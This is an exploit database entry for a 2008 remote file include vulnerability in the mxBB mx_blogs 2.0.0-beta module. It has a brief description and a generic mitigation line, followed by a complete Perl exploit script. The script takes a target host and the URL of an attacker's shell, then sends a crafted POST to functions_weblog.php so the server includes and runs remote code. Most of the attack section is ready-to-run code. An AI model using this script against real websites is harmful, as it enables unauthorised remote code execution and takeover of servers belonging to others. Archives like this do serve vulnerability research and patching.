mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit

vendor:

mx_blogs

by:

bd0rk

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: mx_blogs

Affected Version From: 2.0.0-beta

Affected Version To: 2.0.0-beta

Patch Exists: YES

Related CWE: N/A

CPE: a:mx-system:mx_blogs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit

This exploit allows an attacker to inject malicious code into a vulnerable web application. The vulnerability exists in the mx_blogs module of mxBB, which is vulnerable to a remote file include attack. The attacker can inject malicious code into the vulnerable web application by sending a specially crafted HTTP request to the vulnerable web application.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit
#
# Vendor: http://www.mx-system.com
#
# Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405
#
# Vulncode in: /includes/functions_weblog.php line 24
#
# Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN

use Getopt::Long;
use URI::Escape;
use IO::Socket;

$shellcode = "Insert the url to shell here";

main();

sub usage
{
print "\mxBB Module mx_blogs 2.0.0-beta Remote File Include Expl\n";
print "by bd0rk <www.soh-crew.it.tt>\n";
print "-t, --ttarget\t(someone.com)\n";
print "-f, --tshell\t(url to your shellcode)\n";
print "-d, --dir\t(/mx_blogs)\n";
exit;
}

sub main
{
GetOptions ('t|target=s' => \$target,'f|shell=s' => \$shell,'d|dir=s' => \$dir);
usage() unless $target;
$shellcode = $shell unless !$shell;
$url = uri_escape($shellcode);

$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() failed.\n";

print "\nConnected to ".$target.", injecting shellcode.\n";
$sendurl = "mx_root_path=".$url."";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1\n";
print $sock "Host: ".$target."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "Attempted to include shellcode, Response:\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
exit;
}

# milw0rm.com [2008-03-30]